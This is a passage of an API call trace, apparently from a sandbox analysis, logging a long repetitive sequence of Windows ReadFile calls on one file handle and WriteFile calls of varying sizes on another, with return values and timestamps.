lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.562] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x12d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.563] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.563] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.564] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x8d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.564] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.565] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.565] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.565] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.566] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.567] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x175, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.567] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.568] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.568] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.569] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.569] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.570] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.570] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.570] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.571] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.571] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.572] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.572] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.573] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.573] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.574] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.574] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.575] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.575] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.576] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.576] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.577] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x15c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.577] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.578] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.578] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.578] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.579] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x78, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.579] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.580] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.580] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x156, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.581] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.581] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.582] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.582] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.583] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.583] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.584] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.584] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.585] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.585] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.586] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.586] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.587] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.587] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.588] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.588] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.588] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.589] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.589] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.590] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.590] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xaf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.591] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.591] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.592] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.592] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.593] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.593] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.594] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.594] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.595] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.595] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.596] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.596] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.596] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.597] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.598] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.598] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.599] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.599] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.599] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.600] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.601] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.601] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.601] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.602] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.602] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x213, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.603] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.603] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.604] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.604] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.605] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.605] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x235, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.605] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.606] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.606] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.607] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x252, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.607] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.608] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.608] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.609] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.609] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, 